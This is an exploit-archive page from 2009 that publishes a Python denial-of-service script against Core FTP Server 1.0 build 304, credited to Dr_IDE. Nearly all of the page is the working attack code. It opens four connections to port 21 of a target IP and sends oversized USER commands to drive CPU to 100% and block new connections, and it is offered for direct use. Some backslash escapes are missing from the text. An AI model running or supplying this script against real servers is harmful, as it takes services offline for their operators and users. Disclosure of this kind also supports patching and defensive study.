[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Core FTP Server 1.0 build 304 DoS
# Published : 2009-09-28
# Author : Dr_IDE
# Previous Title : Cerberus FTP server 3.0.6 Pre-Auth DoS
# Next Title : Kaspersky AV 2010 9.0.0.463 Local DoS
#!/usr/bin/env python
###################################################################################
#
# Core FTP Server 1.0, build 304 Remote Denial of Service Exploit (Pre Auth)
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: http://www.coreftp.com/server/
# Notes: This will cause CPU usage to go to 100% and prevent new connections
# Usage: ./script <Target IP>
#
###################################################################################
import socket, sys
def banner():
print "n##################################################################"
print "# #"
print "# Core FTP Server 1.0, build 304 Remote DoS Exploit #"
print "# by Dr_IDE #"
print "# #"
print "##################################################################n"
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
buff = ("x41" * 2048);
try:
banner();
print ("[*] Connecting to target...");
s1.connect((sys.argv[1] , 21));
s2.connect((sys.argv[1] , 21));
s3.connect((sys.argv[1] , 21));
s4.connect((sys.argv[1] , 21));
print ("[*] Sending evil stuff...");
s1.send("USER " + buff + "rn");
s2.send("USER " + buff + "rn");
s3.send("USER " + buff + "rn");
s4.send("USER " + buff + "rn");
print ("[*] Success! The server should now be inaccessible");
s1.close();
s2.close();
s3.close();
s4.close();
except:
print ("[-] Could not connect to server.");